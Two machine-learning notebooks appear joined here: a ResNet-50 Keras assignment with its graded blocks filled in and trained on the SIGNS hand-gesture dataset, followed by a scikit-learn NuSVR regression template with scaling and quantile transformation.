from keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D
from keras.models import Model, load_model
from keras.preprocessing import image
from keras.utils import layer_utils
from keras.utils.data_utils import get_file
from keras.applications.imagenet_utils import preprocess_input
import pydot
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
from keras.utils import plot_model
from resnets_utils import *
from keras.initializers import glorot_uniform
import scipy.misc
from matplotlib.pyplot import imshow
%matplotlib inline
import keras.backend as K
K.set_image_data_format('channels_last')
K.set_learning_phase(1)
```
## 1 - The problem of very deep neural networks
Last week, you built your first convolutional neural network. In recent years, neural networks have become deeper, with state-of-the-art networks going from just a few layers (e.g., AlexNet) to over a hundred layers.
* The main benefit of a very deep network is that it can represent very complex functions. It can also learn features at many different levels of abstraction, from edges (at the shallower layers, closer to the input) to very complex features (at the deeper layers, closer to the output).
* However, using a deeper network doesn't always help. A huge barrier to training them is vanishing gradients: very deep networks often have a gradient signal that goes to zero quickly, thus making gradient descent prohibitively slow.
* More specifically, during gradient descent, as you backprop from the final layer back to the first layer, you are multiplying by the weight matrix on each step, and thus the gradient can decrease exponentially quickly to zero (or, in rare cases, grow exponentially quickly and "explode" to take very large values).
* During training, you might therefore see the magnitude (or norm) of the gradient for the shallower layers decrease to zero very rapidly as training proceeds:
<img src="images/vanishing_grad_kiank.png" style="width:450px;height:220px;">
<caption><center> <u> <font color='purple'> **Figure 1** </u><font color='purple'> : **Vanishing gradient** <br> The speed of learning decreases very rapidly for the shallower layers as the network trains </center></caption>
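The exponential shrinkage described above can be sketched numerically. The following toy example (not part of the assignment) backpropagates a gradient through 50 layers of small random weight matrices and watches its norm collapse:

```
import numpy as np

rng = np.random.RandomState(0)
n = 64

# Backprop multiplies the gradient by one weight matrix per layer; with
# small random weights the gradient norm shrinks roughly geometrically.
grad = np.ones(n)
norms = []
for layer in range(50):
    W = rng.randn(n, n) * 0.05   # deliberately small weights
    grad = W.T @ grad            # the linear part of one backprop step
    norms.append(np.linalg.norm(grad))

print(norms[0], norms[-1])       # the final norm is vanishingly small
```

With a skip connection, each block's Jacobian is close to the identity plus a perturbation, so the product of Jacobians no longer collapses to zero in the same way.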
You are now going to solve this problem by building a Residual Network!
## 2 - Building a Residual Network
In ResNets, a "shortcut" or a "skip connection" allows the model to skip layers:
<img src="images/skip_connection_kiank.png" style="width:650px;height:200px;">
<caption><center> <u> <font color='purple'> **Figure 2** </u><font color='purple'> : A ResNet block showing a **skip-connection** <br> </center></caption>
The image on the left shows the "main path" through the network. The image on the right adds a shortcut to the main path. By stacking these ResNet blocks on top of each other, you can form a very deep network.
We also saw in lecture that having ResNet blocks with the shortcut also makes it very easy for one of the blocks to learn an identity function. This means that you can stack on additional ResNet blocks with little risk of harming training set performance.
(There is also some evidence that the ease of learning an identity function explains ResNets' remarkable performance even more than the skip connections' help with vanishing gradients.)
Two main types of blocks are used in a ResNet, depending mainly on whether the input/output dimensions are same or different. You are going to implement both of them: the "identity block" and the "convolutional block."
### 2.1 - The identity block
The identity block is the standard block used in ResNets, and corresponds to the case where the input activation (say $a^{[l]}$) has the same dimension as the output activation (say $a^{[l+2]}$). To flesh out the different steps of what happens in a ResNet's identity block, here is an alternative diagram showing the individual steps:
<img src="images/idblock2_kiank.png" style="width:650px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 3** </u><font color='purple'> : **Identity block.** Skip connection "skips over" 2 layers. </center></caption>
The upper path is the "shortcut path." The lower path is the "main path." In this diagram, we have also made explicit the CONV2D and ReLU steps in each layer. To speed up training we have also added a BatchNorm step. Don't worry about this being complicated to implement--you'll see that BatchNorm is just one line of code in Keras!
In this exercise, you'll actually implement a slightly more powerful version of this identity block, in which the skip connection "skips over" 3 hidden layers rather than 2 layers. It looks like this:
<img src="images/idblock3_kiank.png" style="width:650px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 4** </u><font color='purple'> : **Identity block.** Skip connection "skips over" 3 layers.</center></caption>
Here are the individual steps.
First component of main path:
- The first CONV2D has $F_1$ filters of shape (1,1) and a stride of (1,1). Its padding is "valid" and its name should be `conv_name_base + '2a'`. Use 0 as the seed for the random initialization.
- The first BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2a'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Second component of main path:
- The second CONV2D has $F_2$ filters of shape $(f,f)$ and a stride of (1,1). Its padding is "same" and its name should be `conv_name_base + '2b'`. Use 0 as the seed for the random initialization.
- The second BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2b'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Third component of main path:
- The third CONV2D has $F_3$ filters of shape (1,1) and a stride of (1,1). Its padding is "valid" and its name should be `conv_name_base + '2c'`. Use 0 as the seed for the random initialization.
- The third BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2c'`.
- Note that there is **no** ReLU activation function in this component.
Final step:
- The `X_shortcut` and the output from the 3rd layer `X` are added together.
- **Hint**: The syntax will look something like `Add()([var1,var2])`
- Then apply the ReLU activation function. This has no name and no hyperparameters.
**Exercise**: Implement the ResNet identity block. We have implemented the first component of the main path. Please read this carefully to make sure you understand what it is doing. You should implement the rest.
- To implement the Conv2D step: [Conv2D](https://keras.io/layers/convolutional/#conv2d)
- To implement BatchNorm: [BatchNormalization](https://keras.io/layers/normalization/#batchnormalization) (axis: Integer, the axis that should be normalized (typically the 'channels' axis))
- For the activation, use: `Activation('relu')(X)`
- To add the value passed forward by the shortcut: [Add](https://keras.io/layers/merge/#add)
```
# GRADED FUNCTION: identity_block
def identity_block(X, f, filters, stage, block):
"""
Implementation of the identity block as defined in Figure 4
Arguments:
X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev)
f -- integer, specifying the shape of the middle CONV's window for the main path
filters -- python list of integers, defining the number of filters in the CONV layers of the main path
stage -- integer, used to name the layers, depending on their position in the network
block -- string/character, used to name the layers, depending on their position in the network
Returns:
X -- output of the identity block, tensor of shape (n_H, n_W, n_C)
"""
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value. You'll need this later to add back to the main path.
X_shortcut = X
# First component of main path
X = Conv2D(filters = F1, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)
X = Activation('relu')(X)
### START CODE HERE ###
# Second component of main path (≈3 lines)
X = Conv2D(filters = F2, kernel_size = (f, f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path (≈2 lines)
X = Conv2D(filters = F3, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)
# Final step: Add shortcut value to main path, and pass it through a RELU activation (≈2 lines)
    X = Add()([X_shortcut, X])
    X = Activation('relu')(X)
### END CODE HERE ###
return X
tf.reset_default_graph()
with tf.Session() as test:
np.random.seed(1)
A_prev = tf.placeholder("float", [3, 4, 4, 6])
X = np.random.randn(3, 4, 4, 6)
A = identity_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, block = 'a')
test.run(tf.global_variables_initializer())
out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0})
print("out = " + str(out[0][1][1][0]))
```
**Expected Output**:
<table>
<tr>
<td>
**out**
</td>
<td>
[ 0.94822985 0. 1.16101444 2.747859 0. 1.36677003]
</td>
</tr>
</table>
## 2.2 - The convolutional block
The ResNet "convolutional block" is the second block type. You can use this type of block when the input and output dimensions don't match up. The difference with the identity block is that there is a CONV2D layer in the shortcut path:
<img src="images/convblock_kiank.png" style="width:650px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 4** </u><font color='purple'> : **Convolutional block** </center></caption>
* The CONV2D layer in the shortcut path is used to resize the input $x$ to a different dimension, so that the dimensions match up in the final addition needed to add the shortcut value back to the main path. (This plays a similar role as the matrix $W_s$ discussed in lecture.)
* For example, to reduce the activation dimensions's height and width by a factor of 2, you can use a 1x1 convolution with a stride of 2.
* The CONV2D layer on the shortcut path does not use any non-linear activation function. Its main role is to just apply a (learned) linear function that reduces the dimension of the input, so that the dimensions match up for the later addition step.
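To see concretely why a 1x1 convolution with stride 2 halves the height and width, you can plug into the standard output-size formula (a small sketch, independent of Keras):

```
def conv_output_size(n, f, pad, stride):
    """Output size of a convolution: floor((n + 2*pad - f) / stride) + 1."""
    return (n + 2 * pad - f) // stride + 1

print(conv_output_size(64, f=1, pad=0, stride=2))  # 32: a 1x1/stride-2 conv halves 64
print(conv_output_size(64, f=7, pad=3, stride=2))  # 32: the stage-1 7x7 conv does too
```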
The details of the convolutional block are as follows.
First component of main path:
- The first CONV2D has $F_1$ filters of shape (1,1) and a stride of (s,s). Its padding is "valid" and its name should be `conv_name_base + '2a'`. Use 0 as the `glorot_uniform` seed.
- The first BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2a'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Second component of main path:
- The second CONV2D has $F_2$ filters of shape (f,f) and a stride of (1,1). Its padding is "same" and its name should be `conv_name_base + '2b'`. Use 0 as the `glorot_uniform` seed.
- The second BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2b'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Third component of main path:
- The third CONV2D has $F_3$ filters of shape (1,1) and a stride of (1,1). Its padding is "valid" and its name should be `conv_name_base + '2c'`. Use 0 as the `glorot_uniform` seed.
- The third BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2c'`. Note that there is no ReLU activation function in this component.
Shortcut path:
- The CONV2D has $F_3$ filters of shape (1,1) and a stride of (s,s). Its padding is "valid" and its name should be `conv_name_base + '1'`. Use 0 as the `glorot_uniform` seed.
- The BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '1'`.
Final step:
- The shortcut and the main path values are added together.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
**Exercise**: Implement the convolutional block. We have implemented the first component of the main path; you should implement the rest. As before, always use 0 as the seed for the random initialization, to ensure consistency with our grader.
- [Conv2D](https://keras.io/layers/convolutional/#conv2d)
- [BatchNormalization](https://keras.io/layers/normalization/#batchnormalization) (axis: Integer, the axis that should be normalized (typically the features axis))
- For the activation, use: `Activation('relu')(X)`
- [Add](https://keras.io/layers/merge/#add)
```
# GRADED FUNCTION: convolutional_block
def convolutional_block(X, f, filters, stage, block, s = 2):
"""
Implementation of the convolutional block as defined in Figure 4
Arguments:
X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev)
f -- integer, specifying the shape of the middle CONV's window for the main path
filters -- python list of integers, defining the number of filters in the CONV layers of the main path
stage -- integer, used to name the layers, depending on their position in the network
block -- string/character, used to name the layers, depending on their position in the network
s -- Integer, specifying the stride to be used
Returns:
X -- output of the convolutional block, tensor of shape (n_H, n_W, n_C)
"""
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
##### MAIN PATH #####
# First component of main path
X = Conv2D(F1,kernel_size= (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)
X = Activation('relu')(X)
### START CODE HERE ###
# Second component of main path (≈3 lines)
X = Conv2D(F2,kernel_size= (f, f), strides = (1,1), name = conv_name_base + '2b',padding = 'same', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path (≈2 lines)
X = Conv2D(F3,kernel_size= (1, 1), strides = (1,1),padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)
##### SHORTCUT PATH #### (≈2 lines)
X_shortcut = Conv2D(F3,kernel_size= (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '1', kernel_initializer = glorot_uniform(seed=0))(X_shortcut)
X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + '1')(X_shortcut)
# Final step: Add shortcut value to main path, and pass it through a RELU activation (≈2 lines)
X = Add()([X,X_shortcut])
X = Activation('relu')(X)
### END CODE HERE ###
return X
tf.reset_default_graph()
with tf.Session() as test:
np.random.seed(1)
A_prev = tf.placeholder("float", [3, 4, 4, 6])
X = np.random.randn(3, 4, 4, 6)
A = convolutional_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, block = 'a')
test.run(tf.global_variables_initializer())
out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0})
print("out = " + str(out[0][1][1][0]))
```
**Expected Output**:
<table>
<tr>
<td>
**out**
</td>
<td>
[ 0.09018463 1.23489773 0.46822017 0.0367176 0. 0.65516603]
</td>
</tr>
</table>
## 3 - Building your first ResNet model (50 layers)
You now have the necessary blocks to build a very deep ResNet. The following figure describes in detail the architecture of this neural network. "ID BLOCK" in the diagram stands for "Identity block," and "ID BLOCK x3" means you should stack 3 identity blocks together.
<img src="images/resnet_kiank.png" style="width:850px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 5** </u><font color='purple'> : **ResNet-50 model** </center></caption>
The details of this ResNet-50 model are:
- Zero-padding pads the input with a pad of (3,3)
- Stage 1:
- The 2D Convolution has 64 filters of shape (7,7) and uses a stride of (2,2). Its name is "conv1".
- BatchNorm is applied to the 'channels' axis of the input.
- MaxPooling uses a (3,3) window and a (2,2) stride.
- Stage 2:
- The convolutional block uses three sets of filters of size [64,64,256], "f" is 3, "s" is 1 and the block is "a".
- The 2 identity blocks use three sets of filters of size [64,64,256], "f" is 3 and the blocks are "b" and "c".
- Stage 3:
- The convolutional block uses three sets of filters of size [128,128,512], "f" is 3, "s" is 2 and the block is "a".
- The 3 identity blocks use three sets of filters of size [128,128,512], "f" is 3 and the blocks are "b", "c" and "d".
- Stage 4:
- The convolutional block uses three sets of filters of size [256, 256, 1024], "f" is 3, "s" is 2 and the block is "a".
- The 5 identity blocks use three sets of filters of size [256, 256, 1024], "f" is 3 and the blocks are "b", "c", "d", "e" and "f".
- Stage 5:
- The convolutional block uses three sets of filters of size [512, 512, 2048], "f" is 3, "s" is 2 and the block is "a".
- The 2 identity blocks use three sets of filters of size [512, 512, 2048], "f" is 3 and the blocks are "b" and "c".
- The 2D Average Pooling uses a window of shape (2,2) and its name is "avg_pool".
- The 'flatten' layer doesn't have any hyperparameters or name.
- The Fully Connected (Dense) layer reduces its input to the number of classes using a softmax activation. Its name should be `'fc' + str(classes)`.
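As a sanity check on the name "ResNet-50", you can count the weighted layers listed above (shortcut convolutions are conventionally not counted):

```
# Stage 1 contributes 1 conv; stages 2-5 contain (3, 4, 6, 3) blocks,
# each with 3 convs on its main path; the final Dense layer adds 1 more.
blocks_per_stage = [3, 4, 6, 3]
n_layers = 1 + sum(3 * b for b in blocks_per_stage) + 1
print(n_layers)  # 50
```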
**Exercise**: Implement the ResNet with 50 layers described in the figure above. We have implemented Stages 1 and 2. Please implement the rest. (The syntax for implementing Stages 3-5 should be quite similar to that of Stage 2.) Make sure you follow the naming convention in the text above.
You'll need to use this function:
- Average pooling [see reference](https://keras.io/layers/pooling/#averagepooling2d)
Here are some other functions we used in the code below:
- Conv2D: [See reference](https://keras.io/layers/convolutional/#conv2d)
- BatchNorm: [See reference](https://keras.io/layers/normalization/#batchnormalization) (axis: Integer, the axis that should be normalized (typically the features axis))
- Zero padding: [See reference](https://keras.io/layers/convolutional/#zeropadding2d)
- Max pooling: [See reference](https://keras.io/layers/pooling/#maxpooling2d)
- Fully connected layer: [See reference](https://keras.io/layers/core/#dense)
- Addition: [See reference](https://keras.io/layers/merge/#add)
```
# GRADED FUNCTION: ResNet50
def ResNet50(input_shape = (64, 64, 3), classes = 6):
"""
    Implementation of the popular ResNet50 with the following architecture:
CONV2D -> BATCHNORM -> RELU -> MAXPOOL -> CONVBLOCK -> IDBLOCK*2 -> CONVBLOCK -> IDBLOCK*3
-> CONVBLOCK -> IDBLOCK*5 -> CONVBLOCK -> IDBLOCK*2 -> AVGPOOL -> TOPLAYER
Arguments:
input_shape -- shape of the images of the dataset
classes -- integer, number of classes
Returns:
model -- a Model() instance in Keras
"""
# Define the input as a tensor with shape input_shape
X_input = Input(input_shape)
# Zero-Padding
X = ZeroPadding2D((3, 3))(X_input)
# Stage 1
X = Conv2D(64, (7, 7), strides = (2, 2), name = 'conv1', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = 'bn_conv1')(X)
X = Activation('relu')(X)
X = MaxPooling2D((3, 3), strides=(2, 2))(X)
# Stage 2
X = convolutional_block(X, f = 3, filters = [64, 64, 256], stage = 2, block='a', s = 1)
X = identity_block(X, 3, [64, 64, 256], stage=2, block='b')
X = identity_block(X, 3, [64, 64, 256], stage=2, block='c')
### START CODE HERE ###
#[128,128,512], "f" is 3, "s" is 2 and the block is "a".
#The 3 identity blocks use three sets of filters of size [128,128,512], "f" is 3 and the blocks are "b", "c" and "d".
# Stage 3 (≈4 lines)
X = convolutional_block(X,f=3,s=2,filters = [128,128,512],stage = 3,block = 'a')
X = identity_block(X,3,[128,128,512],stage = 3,block = 'b')
X = identity_block(X,3,[128,128,512],stage = 3,block = 'c')
X = identity_block(X,3,[128,128,512],stage = 3,block = 'd')
#The convolutional block uses three sets of filters of size [256, 256, 1024], "f" is 3, "s" is 2 and the block is "a".
#The 5 identity blocks use three sets of filters of size [256, 256, 1024], "f" is 3 and the blocks are "b", "c", "d", "e" and "f".
# Stage 4 (≈6 lines)
X = convolutional_block(X, f=3, filters=[256, 256, 1024], stage=4, block='a', s=2)
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f')
# Stage 5 (≈3 lines)
    X = convolutional_block(X, f=3, filters=[512, 512, 2048], stage=5, block='a', s=2)
X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b')
X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c')
# AVGPOOL (≈1 line). Use "X = AveragePooling2D(...)(X)"
    X = AveragePooling2D(pool_size=(2, 2), name='avg_pool')(X)
### END CODE HERE ###
# output layer
X = Flatten()(X)
X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X)
# Create model
model = Model(inputs = X_input, outputs = X, name='ResNet50')
return model
```
Run the following code to build the model's graph. If your implementation is not correct you will know it by checking your accuracy when running `model.fit(...)` below.
```
model = ResNet50(input_shape = (64, 64, 3), classes = 6)
```
As seen in the Keras Tutorial Notebook, before training a model you need to configure the learning process by compiling the model.
```
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
```
The model is now ready to be trained. The only thing you need is a dataset.
Let's load the SIGNS Dataset.
<img src="images/signs_data_kiank.png" style="width:450px;height:250px;">
<caption><center> <u> <font color='purple'> **Figure 6** </u><font color='purple'> : **SIGNS dataset** </center></caption>
```
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
# Normalize image vectors
X_train = X_train_orig/255.
X_test = X_test_orig/255.
# Convert training and test labels to one hot matrices
Y_train = convert_to_one_hot(Y_train_orig, 6).T
Y_test = convert_to_one_hot(Y_test_orig, 6).T
print ("number of training examples = " + str(X_train.shape[0]))
print ("number of test examples = " + str(X_test.shape[0]))
print ("X_train shape: " + str(X_train.shape))
print ("Y_train shape: " + str(Y_train.shape))
print ("X_test shape: " + str(X_test.shape))
print ("Y_test shape: " + str(Y_test.shape))
```
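If you are curious what `convert_to_one_hot` from `resnets_utils` does, an equivalent one-liner (a sketch, not the utility's actual source) uses rows of an identity matrix:

```
import numpy as np

def one_hot(Y, C):
    # Row Y[i] of np.eye(C) is the one-hot vector for class Y[i];
    # transposing gives shape (C, m), matching convert_to_one_hot.
    return np.eye(C)[Y.reshape(-1)].T

labels = np.array([0, 2, 1])
print(one_hot(labels, 6).T)  # one row per example, a single 1 per row
```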
Run the following cell to train your model on 2 epochs with a batch size of 32. On a CPU it should take you around 5min per epoch.
```
model.fit(X_train, Y_train, epochs = 2, batch_size = 32)
```
**Expected Output**:
<table>
<tr>
<td>
**Epoch 1/2**
</td>
<td>
loss: between 1 and 5, acc: between 0.2 and 0.5, although your results can be different from ours.
</td>
</tr>
<tr>
<td>
**Epoch 2/2**
</td>
<td>
loss: between 1 and 5, acc: between 0.2 and 0.5, you should see your loss decreasing and the accuracy increasing.
</td>
</tr>
</table>
Let's see how this model (trained on only two epochs) performs on the test set.
```
preds = model.evaluate(X_test, Y_test)
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
```
**Expected Output**:
<table>
<tr>
<td>
**Test Accuracy**
</td>
<td>
between 0.16 and 0.25
</td>
</tr>
</table>
For the purpose of this assignment, we've asked you to train the model for just two epochs. You can see that it achieves poor performance. Please go ahead and submit your assignment; to check correctness, the online grader will also run your code for only a small number of epochs.
After you have finished this official (graded) part of this assignment, you can also optionally train the ResNet for more iterations, if you want. We get a lot better performance when we train for ~20 epochs, but this will take more than an hour when training on a CPU.
Using a GPU, we've trained our own ResNet50 model's weights on the SIGNS dataset. You can load and run our trained model on the test set in the cells below. It may take ≈1min to load the model.
```
model = load_model('ResNet50.h5')
preds = model.evaluate(X_test, Y_test)
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
```
ResNet50 is a powerful model for image classification when it is trained for an adequate number of iterations. We hope you can use what you've learned and apply it to your own classification problem to achieve state-of-the-art accuracy.
Congratulations on finishing this assignment! You've now implemented a state-of-the-art image classification system!
## 4 - Test on your own image (Optional/Ungraded)
If you wish, you can also take a picture of your own hand and see the output of the model. To do this:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the following code
4. Run the code and check if the algorithm is right!
```
img_path = 'images/my_image.jpg'
img = image.load_img(img_path, target_size=(64, 64))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = x/255.0
print('Input image shape:', x.shape)
my_image = image.load_img(img_path)  # scipy.misc.imread was removed in recent SciPy versions
imshow(my_image)
print("class prediction vector [p(0), p(1), p(2), p(3), p(4), p(5)] = ")
print(model.predict(x))
```
You can also print a summary of your model by running the following code.
```
model.summary()
```
Finally, run the code below to visualize your ResNet50. You can also download a .png picture of your model by going to "File -> Open...-> model.png".
```
plot_model(model, to_file='model.png')
SVG(model_to_dot(model).create(prog='dot', format='svg'))
```
## What you should remember
- Very deep "plain" networks don't work in practice because they are hard to train due to vanishing gradients.
- The skip-connections help to address the Vanishing Gradient problem. They also make it easy for a ResNet block to learn an identity function.
- There are two main types of blocks: The identity block and the convolutional block.
- Very deep Residual Networks are built by stacking these blocks together.
### References
This notebook presents the ResNet algorithm due to He et al. (2015). The implementation here also took significant inspiration and follows the structure given in the GitHub repository of Francois Chollet:
- Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun - [Deep Residual Learning for Image Recognition (2015)](https://arxiv.org/abs/1512.03385)
- Francois Chollet's GitHub repository: https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
# Nu-Support Vector Regression with StandardScaler & Quantile Transformer
This code template is for regression analysis using a Nu-Support Vector Regressor (NuSVR), based on the Support Vector Machine algorithm, with QuantileTransformer as the feature-transformation technique and StandardScaler for feature scaling, combined in a pipeline.
### Required Packages
```
import warnings
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as se
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler, QuantileTransformer
from sklearn.model_selection import train_test_split
from sklearn.svm import NuSVR
from sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error
warnings.filterwarnings('ignore')
```
### Initialization
Filepath of CSV file
```
file_path= ""
```
List of features required for model training.
```
features =[]
```
Target feature for prediction.
```
target=''
```
### Data Fetching
Pandas is an open-source, BSD-licensed library providing high-performance, easy-to-use data manipulation and data analysis tools.
We will use the pandas library to read the CSV file from its storage path, and the `head` function to display the first few rows.
```
df=pd.read_csv(file_path)
df.head()
```
### Feature Selections
Feature selection is the process of reducing the number of input variables when developing a predictive model, both to reduce the computational cost of modelling and, in some cases, to improve the performance of the model.
We will assign all the required input features to X and target/outcome to Y.
```
X=df[features]
Y=df[target]
```
### Data Preprocessing
Since most of the machine learning models in the sklearn library don't handle string categorical data or null values, we have to remove or replace them explicitly. The snippet below contains functions that fill in any null values and encode string-class columns as dummy (one-hot) variables.
```
def NullClearner(df):
    # Numeric columns: fill missing values with the column mean
    if(isinstance(df, pd.Series) and (df.dtype in ["float64","int64"])):
        df.fillna(df.mean(),inplace=True)
        return df
    # Categorical columns: fill missing values with the most frequent value
    elif(isinstance(df, pd.Series)):
        df.fillna(df.mode()[0],inplace=True)
        return df
    else: return df
def EncodeX(df):
    # One-hot encode any string/categorical columns
    return pd.get_dummies(df)
```
Calling preprocessing functions on the feature and target set.
```
x=X.columns.to_list()
for i in x:
X[i]=NullClearner(X[i])
Y=NullClearner(Y)
X=EncodeX(X)
X.head()
```
#### Correlation Map
In order to check the correlation between the features, we will plot a correlation matrix. It is effective in summarizing a large amount of data where the goal is to see patterns.
```
f,ax = plt.subplots(figsize=(18, 18))
matrix = np.triu(X.corr())
se.heatmap(X.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax, mask=matrix)
plt.show()
```
### Data Splitting
The train-test split is a procedure for evaluating the performance of an algorithm. The procedure involves taking a dataset and dividing it into two subsets. The first subset is utilized to fit/train the model. The second subset is used for prediction. The main motive is to estimate the performance of the model on new data.
```
X_train,X_test,y_train,y_test=train_test_split(X,Y,test_size=0.2,random_state=123)
```
### Model
Support vector machines (SVMs) are a set of supervised learning methods used for classification, regression and outliers detection.
A Support Vector Machine is a discriminative classifier formally defined by a separating hyperplane: given labelled training data, the SVM outputs a hyperplane that classifies new cases. In 2-dimensional space this hyperplane is a line dividing the plane into two segments, with each class on one side.
Here we will use NuSVR. The NuSVR implementation is based on libsvm. Similar to NuSVC, it uses a parameter nu to control the number of support vectors; however, unlike NuSVC, where nu replaces C, here nu replaces the parameter epsilon of epsilon-SVR.
#### Model Tuning Parameters
1. nu : float, default=0.5
> An upper bound on the fraction of training errors and a lower bound of the fraction of support vectors. Should be in the interval (0, 1]. By default 0.5 will be taken.
2. C : float, default=1.0
> Regularization parameter. The strength of the regularization is inversely proportional to C. Must be strictly positive. The penalty is a squared l2 penalty.
3. kernel : {‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed’}, default=’rbf’
> Specifies the kernel type to be used in the algorithm. It must be one of ‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed’ or a callable. If none is given, ‘rbf’ will be used. If a callable is given it is used to pre-compute the kernel matrix from data matrices; that matrix should be an array of shape (n_samples, n_samples).
4. gamma : {‘scale’, ‘auto’} or float, default=’scale’
> Gamma is a hyperparameter that we have to set before the training model. Gamma decides how much curvature we want in a decision boundary.
5. degree : int, default=3
> Degree of the polynomial kernel function (‘poly’). Ignored by all other kernels.Using degree 1 is similar to using a linear kernel. Also, increasing degree parameter leads to higher training times.
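For the `'precomputed'` option mentioned above, you supply the Gram matrix yourself; a minimal numpy sketch for the linear kernel (hypothetical data, just to show the required shape):

```
import numpy as np

X = np.array([[1.0, 2.0],
              [3.0, 4.0],
              [5.0, 6.0]])
gram = X @ X.T              # linear-kernel Gram matrix
print(gram.shape)           # (3, 3): always (n_samples, n_samples)
```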
#### Rescaling technique
Standardize features by removing the mean and scaling to unit variance
The standard score of a sample x is calculated as:
z = (x - u) / s
where u is the mean of the training samples or zero if with_mean=False, and s is the standard deviation of the training samples or one if with_std=False.
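Written out by hand, the standard score computed by `StandardScaler` looks like this (toy data, for illustration only):

```
import numpy as np

x = np.array([2.0, 4.0, 6.0, 8.0])
u, s = x.mean(), x.std()    # StandardScaler uses the population std by default
z = (x - u) / s
print(z.mean(), z.std())    # ~0.0 and 1.0 after scaling
```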
#### Feature Transformation
Transform features using quantiles information.
This method transforms the features to follow a uniform or a normal distribution. Therefore, for a given feature, this transformation tends to spread out the most frequent values. It also reduces the impact of (marginal) outliers: this is therefore a robust preprocessing scheme.The transformation is applied on each feature independently.
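The effect on an outlier can be seen in a hand-rolled uniform quantile transform (a simplified sketch assuming distinct values; `QuantileTransformer` itself interpolates between estimated quantiles):

```
import numpy as np

x = np.array([1.0, 2.0, 3.0, 1000.0])  # note the extreme outlier
ranks = x.argsort().argsort()          # empirical rank of each value
u = ranks / (len(x) - 1)               # scale ranks into [0, 1]
print(u)                               # the outlier maps to 1.0, no longer extreme
```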
```
model=make_pipeline(StandardScaler(),QuantileTransformer(),NuSVR())
model.fit(X_train,y_train)
```
#### Model Accuracy
We will use the trained model to make a prediction on the test set.Then use the predicted value for measuring the accuracy of our model.
> **score**: The **score** function returns the coefficient of determination <code>R<sup>2</sup></code> of the prediction.
```
print("Model score (R2): {:.2f} %\n".format(model.score(X_test,y_test)*100))
```
